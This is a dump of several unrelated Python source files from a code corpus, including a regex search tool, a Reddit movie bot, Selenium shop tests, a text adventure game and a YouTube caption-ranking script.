{}'.format(color_word(word_color)) + end\n else:\n result += ' {}'.format(word)\n yield result\n\n @staticmethod\n def get_iterator_values(iterator):\n \"\"\"\n get iterator which is start and end index of matched regex\n and return a list of tuple(start,end) indexes\n \"\"\"\n res = [(v.start(), v.end()) for v in iterator]\n return res\n\n @staticmethod\n def remove_files_post_use():\n \"\"\"\n use the intermediate files as temp and remove it after use\n \"\"\"\n file_list = glob.glob('*.text')\n for file in file_list:\n os.remove(file)\n\n @staticmethod\n def machine_readable(line, regex):\n \"\"\"\n format -> file_name:line_no:start_pos:matched_text\n reads the output file from default print format and convert to machine readable format\n \"\"\"\n pattern_start_index = re.search(regex, line)\n start_pos = pattern_start_index.start()\n add_start_pos = [val.strip() for val in line.split(\":\")]\n add_start_pos.insert(2, str(start_pos))\n add_start_pos = add_start_pos[0:3]\n # print(':'.join(add_start_pos) + \":\" + ' '.join(re.findall(regex, line)))\n add_start_pos_str = ':'.join(add_start_pos)\n patter_str = ' '.join(re.findall(regex, line))\n yield \"{}:{}\".format(add_start_pos_str, patter_str)\n\n @staticmethod\n def parse_stdin_default(std_input, regex):\n \"\"\"\n Parse the Standard input data, the case when file name is not provided and\n raw data provided as Standard input\n default output, :line_no: line\n -m then , :line_no:start_pos:line\n -c then color the matched pattern in output\n \"\"\"\n for line_no, line in enumerate(std_input, 1):\n match = re.finditer(r'\\b{}\\b'.format(regex), line)\n found = [val for val in match]\n if len(found) > 0:\n # with open('default_output_stdin.text', 'a') as f:\n # f.write(\":{}:{}\".format(line_no, line))\n yield \":{}:{}\".format(line_no, line)\n\n @staticmethod\n def pattern_search_files(files, regex):\n \"\"\"\n When one or more file names provided in command line\n then parse the files on by one and search the pattern and print output\n :param files: All the files provided with -f option on command line\n :param regex: regular expression to be searched in the file\n \"\"\"\n try:\n for file in files:\n with open(file, 'r', encoding=\"ascii\") as file_line:\n for line_no, line in enumerate(file_line, 1):\n match = re.finditer(r'{}\\b'.format(regex), line)\n found = [val for val in match]\n if len(found)> 0:\n # with open('default_output_files.text', 'a') as f:\n # f.write(\"{}: {}: {}\".format(file, line_no, line))\n yield \"{}: {}: {}\".format(file, line_no, line)\n except Exception as e:\n print(\"File {} doesnt exist\".format(file))\n\n @staticmethod\n def file_color_print(files):\n with open(files, 'r') as f:\n for line in f:\n colored = search.color_the_pattern(line, opts.regex, search.wrapper_color(''))\n print(colored)\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Grabs the command line options\n -f , , default=[sys.stdin]\n default=\"file_name:no_line:start_pos:matched_text\"\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-r', '--regex', type=str, help=\"Regex pattern to search in file\")\n parser.add_argument('-f', '--files', help=\"Files on command line\", nargs='*')\n # group.add_argument('-u', '--underscore', type=str, default=\"^\", help=\"prints '^' under the matching text\")\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-c', '--color', help=\"Highlights matching text [1]\")\n group.add_argument('-m', '--machine', help=\"machine-readable output\")\n opts = parser.parse_args()\n\n # When the file/s name/s not provided on the command line the read from STDIN\n # Exp: cat file.text | python file_parse.py -r find_this_text\n\n search = SearchPattern(opts.files, opts.regex, opts.color, opts.machine)\n\n print(search.opts_val)\n\n try:\n if opts.files:\n if opts.machine:\n for line in search.pattern_search_files(opts.files, opts.regex):\n print(next(search.machine_readable(line.strip(), opts.regex)))\n\n elif opts.color:\n for line in search.pattern_search_files(opts.files, opts.regex):\n print(next(search.color_the_pattern(line.strip(), opts.regex, '')))\n else:\n for line in search.pattern_search_files(opts.files, opts.regex):\n print(line.strip())\n\n\n elif sys.stdin:\n input_stdin = [x for x in sys.stdin]\n if opts.machine:\n search.parse_stdin_default(input_stdin, opts.regex)\n search.machine_readable('default_output_stdin.text', opts.regex)\n search.remove_files_post_use()\n elif opts.color:\n search.parse_stdin_default(input_stdin, opts.regex)\n search.file_color_print('default_output_stdin.text')\n search.remove_files_post_use()\n else:\n search.parse_stdin_default(input_stdin, opts.regex)\n search.file_print('default_output_stdin.text')\n search.remove_files_post_use()\n\n except Exception as e:\n print(e)\n print('Please use proper format and filename/regex to parse a file')\n print('“Use <-h > For help”')\n # raise Exception\n","sub_path":"parser_file_v3.py","file_name":"parser_file_v3.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"157659219","text":"import praw\nimport pprint\nimport urllib\nimport mechanicalsoup\nimport re\nimport omdb\nimport requests\n\nreddit = praw.Reddit(client_id='',\n client_secret='',\n user_agent='',\n username='Username',\n password='Password')\n\nsubreddit = reddit.subreddit('MovieSuggestions')\ncomments = subreddit.stream.comments()\nbr = mechanicalsoup.StatefulBrowser()\n\n\ndef info(fType, x, text):\n for x in range(len(fType)):\n wurl = fType[x].replace(\" \", \"+\")\n newURL = \"http://www.omdbapi.com/?t={}&apikey=\".format(\n wurl)\n html = requests.get(newURL).text.encode('utf8')\n br.open(newURL)\n\n title = re.findall(r'(?<=\"Title\":\")(.*?)(?=\",)', html)\n year = re.findall(r'(?<=\"Year\":\")(.*?)(?=\",)', html)\n rate = re.findall(r'(?<=\"Rated\":\")(.*?)(?=\",)', html)\n rating = re.findall(r'(?<=\"imdbRating\":\")(.*?)(?=\")', html)\n director = re.findall(r'(?<=\"Director\":\")(.*?)(?=\",)', html)\n summary = re.findall(r'(?<=\"Plot\":\")(.*?)(?=\",)', html)\n error = re.search(r'(?<=\"Error\":)(.*?)(?=!\"})', html)\n\n if error:\n continue\n else:\n if title[0] == fType[x]:\n print(title[0])\n print(year[0])\n print(rate[0])\n print(rating[0])\n print(director[0])\n print(summary[0])\n else:\n continue\n\n\nf = 1\n\nfor comment in comments:\n try:\n author = str(comment.author) # Get author\n except AttributeError: # check if the author has been deleted\n print(\"Author has been deleted\")\n continue\n\n print(\"======================================================\")\n print(\"New Comment # \" + str(f) + \" by \" +\n author.encode('utf-8') + \"\")\n f += 1\n text = str(comment.body.encode('utf-8')) # Fetch body\n print(text)\n\n NumMultiWord = re.findall(\n r'([0-9]+(?= [A-Z])(?: [A-Z][a-z]+)+)', text)\n a = len(NumMultiWord)\n info(NumMultiWord, a, text)\n text = re.sub(r'([0-9]+(?= [A-Z])(?: [A-Z][a-z]+)+)', '', text)\n\n multiWordNum = re.findall(\n r'(?=.*[0-9]+)(?:[A-Z][a-z]*)(?: of the| the| of| a| to| to the| or| and| for the| for a| in the| for| on the| at| and the| from| at the| of a| in)*(?: [0-9]*)', text)\n b = len(multiWordNum)\n info(multiWordNum, b, text)\n text = re.sub(r'(?=.*[0-9]+)(?:[A-Z][a-z]*)(?: of the| the| of| a| to| to the| or| and| for the| for a| in the| for| on the| at| and the| from| at the| of a| in)*(?: [0-9]*)', '', text)\n\n multiWord = re.findall(\n r'([A-Z][a-z]*(?= [A-Z]*)(?: [A-Z][a-z]*)*)(?: of the| of a | and the| at the| to the| for the| in the| of| a| to| or| and| for a| for| on the| at| from| in)*(?: [A-Z][a-z]*)+', text)\n c = len(multiWord)\n info(multiWord, c, text)\n text = re.sub(r'([A-Z][a-z]*(?= [A-Z]*)(?: [A-Z][a-z]*)*)(?: of the| of a | and the| at the| to the| for the| in the| of| a| to| or| and| for a| for| on the| at| from| in)*(?: [A-Z][a-z]*)+', '', text)\n\n OneWordNum = re.findall(\n r'([A-Z][a-z]+(?= [0-9]+)(?: [0-9]*))', text)\n d = len(OneWordNum)\n info(OneWordNum, d, text)\n text = re.sub(r'([A-Z][a-z]+(?= [0-9]+)(?: [0-9]*))', '', text)\n\n NumOneWord = re.findall(\n r'([0-9]*(?= [A-Z][a-z]+)(?: [A-Z][a-z]+))', text)\n e = len(NumOneWord)\n info(NumOneWord, e, text)\n text = re.sub(r'([0-9]*(?= [A-Z][a-z]+)(?: [A-Z][a-z]+))', '', text)\n\n oneWord = re.findall(r'([A-Z][a-z]+)', text)\n f = len(oneWord)\n info(oneWord, f, text)\n","sub_path":"MovieBot.py","file_name":"MovieBot.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"180947277","text":"class Solution(object):\n def transpose(self, A):\n \"\"\"\n :type A: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n result = [[] for i in range(len(A[0]))]\n for i, _i in enumerate(A):\n for j, _j in enumerate(A[i]):\n result[j].append(_j)\n return result\n\n\nsolution = Solution()\n\ntests = (\n ([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[1, 4, 7], [2, 5, 8], [3, 6, 9]]),\n ([[1, 2, 3], [4, 5, 6]], [[1, 4], [2, 5], [3, 6]])\n)\n\nfor _input, expected_result in tests:\n actual_result = solution.transpose(_input)\n assert actual_result == expected_result, f'{actual_result} != {expected_result}, {_input}'\n","sub_path":"867-transponse-matrix.py","file_name":"867-transponse-matrix.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631325294","text":"import numpy\nimport sdf\nimport constant as const\nimport scipy.signal as signal\nimport numpy as np\npi=3.14\ndef E_x_y_zxx(a): \n\tsdfdir=const.sdfdir +str(a).zfill(const.filenumber)+\".sdf\"\n\tdata=sdf.read(sdfdir,dict=True)\n\tEx=data[\"Electric Field/Ex\"].data\n\tEx_y0=Ex[...,int(const.Ny/2)]\n\tEy=data[\"Electric Field/Ey\"].data\n\tEy_y0=Ey[...,int(const.Ny/2)]\n\tk,x,zxx=signal.stft(Ey_y0,fs=2*pi/const.delta_x,nperseg=const.nperseg)\n\tzxx=abs(zxx)\n\tindex = np.unravel_index(zxx.argmax(),zxx.shape)\n\tk_x=np.ones(const.Nx)*k[index[0]]\n\tfor i in range(0,const.Nx):\n\t\tx=i\n\t\ta=zxx[...,int(x/const.nperseg)]\n\t\ta=a.tolist()\n\t\ta[0]=0\n\t\tmax_index=a.index(max(a))\n\t\tif max(a) > 0.2 * zxx[index[0]][index[1]]:\n\t\t\tk_x[i]=(k[max_index])\n\tne=data['Derived/Number_Density/electron1'].data\n\tne_y0=ne[...,int(const.Ny/2)]\n\n\treturn [Ex_y0,Ey_y0,zxx,ne_y0,k_x]\ndef k(x,zxx):\n\ta=zxx[...,int(x/const.nperseg)]\n\ta=a.tolist()\n\ta[0]=0\n\tmax_index=a.index(max(a))\n\t# index=(max_index*pi)/(len(a)*const.delta_x)\n\tindex = (pi/const.delta_x)/len(a) * max_index\n\t#print \"max(k_x),max_index,len(k_x),index\",max(a),max_index,len(a),index # ,index\n\treturn index\ndef scalar_p(Ex_y0):\n\tscalar_p=0\n\te=1.6e-19\n\tc=3e8\n\tm0=9.1e-31\n\timport constant as const\n\ta=np.zeros(const.Nx)\n\tx=const.Nx - 1\n\tfor i in range(0,x+1):\n\t\tscalar_p=Ex_y0[x-i]*const.delta_x+scalar_p \n\t#a.append(e*scalar_p/(m0*c**2)) \n\t\ta[x-i]=e*scalar_p/(m0*c**2) \n\t# print 'n_scalar',a\n\treturn a\ndef wp_2(x,ne_y0):\n\tne=ne_y0[x]\n\t#ne=1e25\n\te=1.6e-19\n\tm0=9.1e-31\n#\tprint \"ne\",ne\n\tw_p_2=ne*e**2/(m0*8.85e-12)\n#\tprint \"w_p\",w_p_2\n\treturn w_p_2\ndef ref_index(x,Ex_y0,Ey_y0,zxx,ne_y0,k_x):\n\tc=3e8\n\twp_x_2=wp_2(x,ne_y0)\n#\tprint \"wp^2\",wp_x_2\n\t#p_y0=scalar_p(Ex_y0)\n\tp_y0_x=p_y0[x]\n#\tprint \"scalar\",p_y0_x\n\t#k_x=k(x,zxx)\n\tk_x=k_x[x]\n\tw0=k_x*c/1\n#\tprint \"w0\",w0\n\ta=wp_x_2/(1+p_y0_x)\n\tb=(k_x*c)**2\n\tc=-(k_x*c)**2\n\t#print \"a,b,c\",a,b,c\n\treturn np.roots([a,b,c])\ndef ref_a(a): \n\tref=[]\n\tEx_y0,Ey_y0,zxx,ne_y0,k_x=E_x_y_zxx(a)\n\tx=const.Nx\n\tglobal p_y0\n\tp_y0=scalar_p(Ex_y0)\n\tfor b in range(0,x):\n\t\tc=ref_index(b,Ex_y0,Ey_y0,zxx,ne_y0,k_x)\n\t\t#print(\"c\",c)\n\t\ta= type(c) == numpy.ndarray\n\t\t#print(\"type\",a)\n\t\tif type(c) == numpy.ndarray:\n\t\t\tc=c[-1]\n\t\t#print(\"c[-1]\",c)\n\t\tref.append(c)\n\t#print(\"ref:\",type(ref[0]))\n\treturn ref\n#def help():\n#\tprint \"func.ref_a(a)\"\n#\tprint \"a,x=1,1\"\n#\tprint \"Ex_y0,Ey_y0,zxx,ne_y0,k_x=func.E_x_y_zxx(a)\"\n#\tprint \"global p_y0\"\n#\tprint \"func.p_y0=scalar_p(Ex_y0)\" \n#\tprint \"func.ref_index(x,Ex_y0,Ey_y0,zxx,ne_y0)\"\n","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"445351023","text":"from .pages.product_page import ProductPage\nfrom .pages.login_page import LoginPage\nfrom .pages.locators import ProductPageLocators\nfrom .pages.locators import LoginPageLocators\nimport pytest\nfrom .pages.basket_page import BasketPage\nimport time\n\n@pytest.mark.parametrize('link', ProductPageLocators.PRODUCT_LINK_PARAMS)\n@pytest.mark.need_review\ndef test_guest_can_add_product_to_basket(browser, link):\n page = ProductPage(browser, link) \n page.open()\n page.add_product_to_basket()\n page.solve_quiz_and_get_code()\n time.sleep(5) # Without this function test does not work with Firefox. Firefox is so slow :(\n page.should_be_match_of_product_names_in_basket_message_and_product_page()\n page.should_be_basket_price_equal_to_added_product_price()\n\n@pytest.mark.xfail(reason=\"bug won't be fixed\")\ndef test_guest_cant_see_success_message_after_adding_product_to_basket(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.add_product_to_basket()\n page.should_not_be_basket_message()\n\ndef test_guest_cant_see_success_message(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.should_not_be_basket_message()\n\n@pytest.mark.xfail(reason=\"bug won't be fixed\")\ndef test_message_disappeared_after_adding_product_to_basket(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.add_product_to_basket()\n success_message_should_disappear()\n \ndef test_guest_should_see_login_link_on_product_page(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.should_be_login_link()\n\n@pytest.mark.need_review \ndef test_guest_can_go_to_login_page_from_product_page(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.go_to_login_page()\n login_page = LoginPage(browser, browser.current_url)\n login_page.should_be_login_page()\n\n@pytest.mark.need_review \ndef test_guest_cant_see_product_in_basket_opened_from_product_page(browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.go_to_basket()\n basket_page = BasketPage(browser, browser.current_url)\n basket_page.should_not_be_products_in_basket()\n basket_page.should_be_empty_basket_message()\n \nclass TestUserAddToBasketFromProductPage():\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n page = LoginPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.go_to_login_page()\n page.register_new_user(str(time.time()) + \"@fakemail.org\", str(time.time()))\n page.should_be_authorized_user()\n \n def test_user_cant_see_success_message(self, browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.should_not_be_basket_message()\n \n @pytest.mark.need_review \n def test_user_can_add_product_to_basket(self, browser):\n page = ProductPage(browser, ProductPageLocators.PRODUCT_LINK)\n page.open()\n page.add_product_to_basket()\n page.should_be_match_of_product_names_in_basket_message_and_product_page()\n page.should_be_basket_price_equal_to_added_product_price()","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"152354458","text":"from room import Room\nfrom player import Player\nfrom item import Item\nimport textwrap\n\nwrapper = textwrap.TextWrapper(width=50) \n\n# Declare all the rooms\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\"),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"),\n}\n\nitem = {\n 'sword': Item(\"Sword\",\n \"helps you fight against enemies\"),\n\n 'torch': Item('torch',\n 'helps you navigate in the dark'),\n\n 'food': Item('food',\n 'replinishes your health and gives you enegry')\n}\n\n\n# Link rooms together\n\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\n#\n# Main\n#\n\n# Make a new player object that is currently in the 'outside' room.\nnew_player = input(\"Please select your player name: \")\nprint('\\n')\nplayer_1 = Player(new_player, room['outside'])\n\n# Write a loop that:\nwhile (True):\n# * Prints the current room name\n current_room = player_1.current_room\n print(f\"\\nCurrent Room: {current_room.name}\")\n\n# * Prints the current description\n word_list = wrapper.wrap(text = current_room.description)\n [print(line) for line in word_list]\n [print(item) for item in current_room.items]\n print('----------------------------------')\n\n# * Waits for user input and decides what to do.\n selection = input(\"Which direction would you like to move?\\nnorth - south - east - west\\n\")\n direction = selection.lower()[0]\n\n# If the user enters a cardinal direction, attempt to move to the room there.\n if direction in ['n', 's', 'e', 'w']:\n player_1.move_player(direction)\n\n # If the user enters \"q\", quit the game.\n elif selection in ['quit', 'q', 'exit']:\n print(\"Thanks for playing!\")\n break\n else:\n print(\"*** Not a valid input. You remain in current room ***\")\n print(\"Please select a direction or quit the game (q)\")\n\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498186321","text":"import base64\nimport datetime\nimport json\n\nclass BitmessageMessage:\n\n def __init__(self, message_dict, client_address):\n self.encoding_type = message_dict['encodingType']\n\n self.from_address = message_dict['fromAddress']\n self.to_address = message_dict['toAddress']\n\n self.received_time_epoch = int(message_dict['receivedTime'])\n self.received_time = datetime.datetime.fromtimestamp(self.received_time_epoch)\n\n self.read = message_dict['read'] == True\n self.msgid = message_dict['msgid']\n\n self.subject_encoded = message_dict['subject']\n self.subject = base64.decodestring(self.subject_encoded)\n\n self.message_encoded = message_dict['message']\n self.message = base64.decodestring(self.message_encoded)\n self.direct = self.to_address == client_address\n\n def __repr__(self):\n return \"BitmessageMessage(id:{0})\".format(self.msgid)\n\n def __str__(self):\n return \\\n \"BitmessageMessage\\nFrom: {0}\\nTo: {1}\\nDate: {2}\\nSubject: {3}\\nMessage: {4}\".format(\n self.from_address,\n self.to_address,\n self.received_time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n self.subject,\n self.message)\n\n def to_json(self):\n msg_dict = {\n \"encoding_type\": self.encoding_type,\n \"from_address\": self.from_address,\n \"received_time\": self.received_time.strftime('%Y-%m-%d %H:%M:%S'),\n \"msgid\": self.msgid,\n \"subject\": self.subject,\n \"message\": self.message\n }\n\n return json.dumps(msg_dict)\n","sub_path":"src/shared/bitmessage_communication/bitmessagemessage.py","file_name":"bitmessagemessage.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"119974839","text":"from json import JSONEncoder\nfrom quizc.model.quiz import Quiz\nfrom quizc.model.quiz_answers import QuizAnswer, Answer\n\nclass MyClass:\n Questions = []\n def __init__(self, x, y):\n self.Quiz = x\n self.Questions = []\n print('-------------')\n for i in y:\n question = {\"title\":i.title,\"type\":i.type}\n print(i.title)\n print(i.type)\n print(i.validations)\n print(i.additional_data)\n print('-------------')\n # self.y = y\n\n\nclass MyEncoder(JSONEncoder):\n def default(self, o):\n return o.__dict__\n\ndef save(data):\n json = MyEncoder().encode(data)\n f = open(\"quizc/data/myform.json\", \"w\")\n f.write(json)\n f.close()\n","sub_path":"quizc/utils/json_persistence.py","file_name":"json_persistence.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"450653908","text":"from __future__ import print_function\nfrom __future__ import division\nimport numpy as np\nimport json\n\nimport httplib2\nimport os\nimport sys\nimport datetime\nimport json\n\nfrom apiclient.discovery import build\nfrom apiclient.errors import HttpError\nimport numpy as np\nfrom bs4 import BeautifulSoup\nimport re\nimport nltk\nimport urllib3\nfrom operator import itemgetter\n\nfrom sklearn.externals import joblib\n\nfrom train_model import vectorize_on_training_set\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport time\n\n# Key and version data \nDEVELOPER_KEY = \"AIzaSyBEuuLWPO0AJIIp7TVGIB1uM_mNiNkMVbw\"\nYOUTUBE_READ_WRITE_SCOPE = \"https://www.googleapis.com/auth/youtube\"\nYOUTUBE_API_SERVICE_NAME = \"youtube\"\nYOUTUBE_API_VERSION = \"v3\"\n\n# Authenticate \nyoutube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)\nwnl = WordNetLemmatizer()\n\n\n\"\"\"Returns the top ten search results for the query in the form \n {video_id:{\"thumbnail\":thumbnail_url, \"title\":video title}}\"\"\"\n\ndef query_search(query):\n\tcurrent_time = time.time()\n\t\t\n\tsearch_request = youtube.search().list(part=\"snippet\", q=query, maxResults=10, videoCaption=\"closedCaption\", type=\"video\")\n\t\n\tsearch_response = search_request.execute()\n\t\n\tsearch_results = {}\n\tfor search_result in search_response[\"items\"]:\n\t\tvideo_id = search_result[\"id\"][\"videoId\"]\n\t\tthumbnail = search_result[\"snippet\"][\"thumbnails\"][\"default\"][\"url\"]\n\t\ttitle = search_result[\"snippet\"][\"title\"]\n\t\tdescription = search_result[\"snippet\"][\"description\"]\n\t\tsearch_results[video_id] = {\"thumbnail\":thumbnail, \"title\":title, \"description\":description}\n\t\n\t# print('Query Finished: ' + str(time.time()-current_time))\n\n\treturn search_results\n\t\n\ndef has_english(vid_id):\n\thttp = urllib3.PoolManager() #init urllib\n\tresp = http.request('GET', 'http://video.google.com/timedtext',preload_content=False,\n\t\t\t\t\t fields={'type': 'list', 'v': vid_id})\n\tsub_dir_xml = resp.read()\n\tresp.close()\n\tdir_soup = BeautifulSoup(sub_dir_xml)\n\teng_track = dir_soup.find(lang_code=\"en\")\n\treturn False if eng_track is None else True\n\ndef get_transcript(vid_id):\n\t\"\"\"\n\tInput: \n\t\tvid_id: Youtube video id\n\tOutput:\n\t\ttranscript: Beautiful soup xml object of transcipt\n\t\tof the format:\n\t\t\n\t\t\t\n\t\t\t\tSPOKEN TEXT\n\t\t\t\n\t\t\n\t\"\"\"\n\tcurrent_time = time.time()\n\n\thttp = urllib3.PoolManager() #init urllib\n\tresp = http.request('GET', 'http://video.google.com/timedtext',preload_content=False,\n\t\t\t\t\t fields={'type': 'list', 'v': vid_id})\n\tsub_dir_xml = resp.read()\n\tresp.close()\n\tdir_soup = BeautifulSoup(sub_dir_xml)\n\teng_track = dir_soup.find(lang_code=\"en\")\n\tif eng_track is None:\n\t\treturn None\n\ttrack_resp = http.request('GET', 'http://video.google.com/timedtext',preload_content=False,\n\t\t\t\t\t\t\t fields={'type': 'track',\n\t\t\t\t\t\t\t\t\t 'v': vid_id, \n\t\t\t\t\t\t\t\t\t 'name': eng_track['name'].encode('unicode-escape'), \n\t\t\t\t\t\t\t\t\t 'lang': 'en'})\n\ttranscript_xml = track_resp.read()\n\ttrack_resp.close()\n\n\t# print('Transcript Finished: ' + str(time.time()-current_time))\n\n\treturn BeautifulSoup(transcript_xml).transcript\n\ndef get_tokens(text):\n\ttext = re.sub(\"'\", \"\\'\", text)\n\ttext = re.sub(\"\\n\", \" \", text)\n\ttext = re.sub(\"[:&%$#@!,.?]\", \"\", text)\n\treturn nltk.word_tokenize(text.lower())\n\ndef format_transcript(transcript):\n\t\"\"\"\n\tInputs:\n\t\tbeautifulsoup transcript\n\tOutputs:\n\t\tarray/dictionary formatted transcript\n\t\"\"\"\n\tcurrent_time = time.time()\n\n\tformatted_transcript = []\n\tfor text_soup in transcript.find_all(\"text\"):\n\t\ttext = text_soup.get_text()\n\t\tif len(text) > 0:\n\t\t\tline = {\n\t\t\t\t\t'text' : text,\n\t\t\t\t\t'dur' : text_soup['dur'] if 'dur' in text_soup else 0,\n\t\t\t\t\t'start' : text_soup['start'] if 'start' in text_soup else 0\n\t\t\t\t\t}\n\t\t\tformatted_transcript.append(line)\n\n\t# print('Transcript Formatting Finished: ' + str(time.time()-current_time))\n\n\treturn formatted_transcript\n\n\ndef get_flattened_transcript(vid_id):\n\ttranscript = get_transcript(vid_id)\n\tflat_text = \"\"\n\tif transcript is not None:\n\t\tfor text_soup in transcript.find_all(\"text\"):\n\t\t\ttext = text_soup.get_text()\n\t\t\tif len(text) > 0:\n\t\t\t\tflat_text += (text + \" \")\n\telse:\n\t\treturn None # The case where we could not get the transcript\n\treturn flat_text[:-1]\n\n\ndef get_formatted_transcript(vid_id):\n\t\"\"\"\n\tConvience method\n\t\"\"\"\n\ttranscript = get_transcript(vid_id)\n\tif transcript is None:\n\t\treturn None\n\treturn format_transcript(transcript)\n\t\n\n\"\"\"Assign conversationality scores to the videos returned and \nreturn a list with the video in ascending order of conversationality\nscore. The final list consists tuple of the form (video_info dictionary, score).\"\"\"\n\ndef rerank_search_results(model, search_results, tfv):\n\tbeginning_time = time.time()\n\t\t\n\t# print('Vectorized Set: ' + str(time.time() - beginning_time))\n\n\tvideos_with_score = [] # contain tuples of video dictionaries and their conversationality score\n\n\t# print('Beginning Search: ' + str(time.time() - beginning_time))\n\t\n\tfor video_id, video_info in search_results.iteritems():\n\t\t# print('Video: ' + str(time.time() - beginning_time))\n\t\tflattened_transcript = get_flattened_transcript(video_id)\n\t\tif flattened_transcript is not None: \n\t\t\tvectorized_captions = tfv.transform([flattened_transcript]) # using previous vectorizer\n\t\t\tconversationality_score = model.predict(vectorized_captions)\n\t\t\tvideos_with_score.append(({video_id : video_info}, conversationality_score[0]))\n\t\t# print('Finished Video: ' + str(time.time() - beginning_time))\n\n\t# print('Finished Search' + str(time.time() - beginning_time))\n\n\treturn sorted(videos_with_score, key=itemgetter(1), reverse=True)\n\t\ndef get_classifer():\n return joblib.load('./trained_models/svr.pkl')\n\ndef get_tfv():\n return joblib.load('./trained_models/tfv.pkl')\n\ndef get_wordcloud(vid_id):\n\ttranscript = re.sub(\"'\", \"\", get_flattened_transcript(vid_id))\n\tcounter = CountVectorizer(stop_words='english')\n\tdata = counter.fit_transform([transcript]).toarray()\n\twords = counter.get_feature_names()\n\tdist = np.sum(data, axis=0)\n\t\n\ttokens_json = []\t\n\tzipped = sorted(zip(dist, words), reverse=True)[:50]\n\n\ttotal = sum([x for (x,_) in zipped])\n\tfactor = 50 / total * 15\n\n\tfor count, tag in sorted(zip(dist, words), reverse=True)[:50]:\n\n\t\ttokens_json.append(\n\t\t\t{'text': tag, \n\t\t\t 'size': count * factor\n\t\t\t})\n\n\n\treturn tokens_json\n\n\nif __name__ == \"__main__\":\n\t# os.chdir(r'C:\\Users\\Maheer\\Dropbox\\Cornell Course Materials\\Spring 2015\\CS 4300\\youtube-caption-prediction')\n\t# starttime = time.time()\n\n\t# tfv = vectorize_on_training_set()\t\n\t# dummy = joblib.load('.././trained_models/dummy.pkl')\n\t# query_results = rerank_search_results(dummy, query_search('cats'), tfv)\n\t\n\t# print('Total Time Taken:' + str(time.time() - starttime))\n\n\tword_cloud = get_wordcloud('3f_h0rxhD9I')\n","sub_path":"searching_and_ml/query_and_rerank.py","file_name":"query_and_rerank.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"553801724","text":"\"\"\"\nPut your Flask app code here.\n\"\"\"\n\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\n\n@app.route('/')\ndef hello():\n return render_template('hello.html')\n\n@app.route('/login/', methods=['GETS','POST'])\ndef login():\n error = None\n if request.method == \"POST\":\n name = request.form.get('name','')\n age = request.form.get('age','')\n ninja = request.form.get('ninja','')\n if name == '' or age == '' or ninja == '':\n error = 'Please check your input and fill in all the boxes'\n return render_template('login.html',name=name, age=age, ninja = 'Patrick Huston',\n error=error)\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142338027","text":"'''\nCreated on 10 apr. 2017\n\n@author: Andrei\n'''\n\nclass JewelRepository(object):\n '''\n classdocs\n '''\n\n\n def __init__(self):\n '''\n Constructor\n '''\n self.__jewelList = []\n \n def createJewel(self,jewel):\n #Descr: adauga o bijuterie\n 